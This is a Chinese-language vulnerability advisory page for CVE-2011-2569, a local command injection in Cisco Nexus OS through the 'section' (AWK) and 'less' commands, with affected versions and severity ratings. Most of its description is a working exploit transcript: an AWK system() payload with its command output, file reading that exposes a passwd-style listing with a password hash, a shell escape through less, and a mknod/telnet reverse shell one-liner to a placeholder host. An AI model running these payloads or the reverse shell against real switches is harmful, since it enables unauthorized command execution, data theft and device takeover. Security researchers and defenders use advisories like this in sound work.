Cisco Nexus OS 'section'和'less'本地命令注入漏洞
CVE编号
CVE-2011-2569利用情况
暂无补丁情况
N/A披露时间
2011-10-28漏洞描述
Cisco Nexus系列交换机是数据中心级交换机。采用Cisco Nexus OS操作系统。section命令作为一个AWK脚本用于传递请求字符串,但是对输入缺少充分过滤,可在LINUX子系统上执行任意命令nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec '* -f /bootflash/20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk nx1# sh clock | sec '* -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost+found 11:18:41.885 UTC Wed Jul 13 2011 可用于删除启动闪存中的任意文件或并发送'reboot'命令。另外less命令韩总,按冒号并按"e"键,指定要打开的文件路径,可查看任意系统文件:bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm 结合使用"|"(管道)然后按"$"宏键,可执行命令:!ls -lah > /bootflash/20110715也可以通过如下方法创建一个远程shell:mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs解决建议
用户可联系供应商获得相应的补丁程序:http://www.cisco.com/
参考链接 |
|
---|---|
http://tools.cisco.com/security/center/viewAlert.x?alertId=24458 |
受影响软件情况
# | 类型 | 厂商 | 产品 | 版本 | 影响面 | ||||
1 | |||||||||
---|---|---|---|---|---|---|---|---|---|
运行在以下环境 | |||||||||
系统 | cisco | nx-os | 4.2 | - | |||||
运行在以下环境 | |||||||||
系统 | cisco | nx-os | 5.0 | - | |||||
运行在以下环境 | |||||||||
系统 | cisco | unified_computing_system_infrastructure_and_unified_computing_system_software | 1.4(1j) | - | |||||
运行在以下环境 | |||||||||
系统 | cisco | unified_computing_system_infrastructure_and_unified_computing_system_software | 2.0(1q) | - | |||||
运行在以下环境 | |||||||||
硬件 | cisco | unified_computing_system | - | - | |||||
- 攻击路径 本地
- 攻击复杂度 低
- 权限要求 一次
- 影响范围 N/A
- 用户交互 无
- 可用性 完全地
- 保密性 完全地
- 完整性 完全地
CWE-ID | 漏洞类型 |
CWE-264 | 权限、特权和访问控制 |
Exp相关链接

版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
评论